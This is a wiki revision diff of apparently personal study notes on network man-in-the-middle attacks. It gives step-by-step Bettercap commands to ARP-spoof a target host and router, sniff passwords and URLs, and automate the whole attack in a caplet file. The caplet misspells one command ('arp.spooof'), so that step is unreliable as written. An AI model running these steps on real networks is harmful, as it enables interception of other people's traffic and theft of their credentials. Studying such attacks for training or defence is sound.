Differences

This shows you the differences between two versions of the page.

--- hack_postconnect_arpspoofing [2020/05/31 17:58] – [arpspoof] gman
+++ hack_postconnect_arpspoofing [2020/05/31 18:11] (current) – [Bettercap ARP Spoof] gman
@@ Line 57: / Line 57: @@
 NOTE: You need to enable port forwarding to allow packets to flow through your machine just like a router.
-  * As root: ``echo 1 > /proc/sys/net/ipv4/ip_forward``
+  * As root: ''echo 1 > /proc/sys/net/ipv4/ip_forward''
+----
+===== Bettercap =====
+Bettercap can do the same thing as arpspoof and more: [[https://www.bettercap.org/modules/ethernet/|docs]].
+Bettercap is a framework to run network attacks:
+  * ARP Spoofing (redirect flow of packets through your machine to analyze, change)
+  * Sniff data (urls, usernames, passwords)
+  * Bypass HTTPS
+  * DNS Spoofing (redirect domain requests)
+  * Inject code in loaded pages
+**Syntax:** ''bettercap -iface [interface]''
+That gets in you into the tool. Type ''help'' to see a menu and the ''help [moduleName]'' to get help on a specific module name you want to use.
+  * At the top of the help information you get syntax to turn on/off, etc.
+  * Under that you get Parameters (options for the module). To change:
+    * Syntax: ''set [option to modify] [true | false]''
+    * Example: ''set arp.spoof.fullduplex true''
+**Module: net.probe** (discover connected clients quickly)
+  * Turn the module on (at bettercap prompt): ''net.probe on''
+  * This will also automatically start the net.recon module (type "help" at prompt to confirm)
+**Module: net.recon**
+  * net.probe sends probe requests to all possible IPs on the network
+  * net.recon monitors ARP cache to take the responses and add them to a list for me to target
+  * net.recon has several commands:
+    * net.show: Show cache hosts list (default sorting by ip).
+----
+===== Bettercap ARP Spoof =====
+Module: arp.spoof (for use, at bettercap prompt: "help arp.spoof")
+  * You MUST have net.probe and net.recon running for this to work.
+. Turn on net.probe if it's not on already
+<code>net.probe on</code>
+. Change module parameter for full duplex (spoof client and router, both):
+<code>set arp.spoof.fullduplex true</code>
+. Change module parameter to add your target client IP (because we set the full-duplex parameter, we do not have to set the gateway, only the client; the gateway/router sets automagically):
+<code>
+set arp.spoof.targets [target IP]
+# or
+set arp.spoof.targets [target IP],[target IP],[target IP]
+</code>
+. Turn ARP spoofing on (see "help arp.spoof") and that's it.
+<code>
+arp.spoof on
+help #to see the modules running
+</code>
+NOTE: If you check our arp table in the client you will see the attach machine's MAC associated with the gateway.
+. To sniff the traffic (still using bettercap; later we'll use Wireshark):
+<code>
+help net.sniff # see the options
+net.sniff on
+</code>
+**Test It:** [[http://testphp.vulnweb.com/|VulnWeb]] (to generate some traffic)
+----
+===== Bettercap Caplets =====
+Caplets are custom scripts for Bettercap (basically text files with commands, one on each line).
+How-To:
+  - Create a text file
+  - On each line put the commands you always run:
+Example (to do all the above when you start Bettercap):
+<code>
+net.probe on
+set arp.spoof.fullduplex true
+set arp.spoof.targets 10.0.0.142
+arp.spooof on
+net.sniff on
+</code>
+To run it:
+<code>bettercap -iface [interface name] -caplet /path/to/caplet.cap</code>
+----